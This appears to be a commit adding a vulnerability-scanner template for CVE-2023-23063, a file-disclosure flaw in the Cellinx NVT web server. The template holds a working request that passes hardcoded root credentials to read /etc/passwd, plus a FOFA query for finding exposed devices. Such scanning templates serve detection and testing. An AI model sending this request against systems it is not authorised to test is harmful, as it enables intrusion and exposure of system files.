Add CVE-2023-23063 (vKEV)

http/cves/2023/CVE-2023-23063.yaml

@@ -0,0 +1,39 @@
+id: CVE-2023-23063
+
+info:
+  name: Cellinx NVT Web Server - Local File Disclosure
+  author: daffainfo
+  severity: high
+  description: |
+    Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.
+  reference:
+    - https://github.com/ahmedalroky/Disclosures/tree/cellinx
+    - http://nvd.nist.gov/vuln/detail/CVE-2023-23063
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-23063
+    cwe-id: CWE-22
+    epss-score: 0.00096
+    epss-percentile: 0.27937
+    cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cellinx
+    product: nvt_web_server
+    fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
+  tags: cve,cve2023,cellinx,lfi,nvt,vkev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "regex('root:.*:0:0:', body)"
+          - "contains(header, 'TRACKID=')"
+        condition: and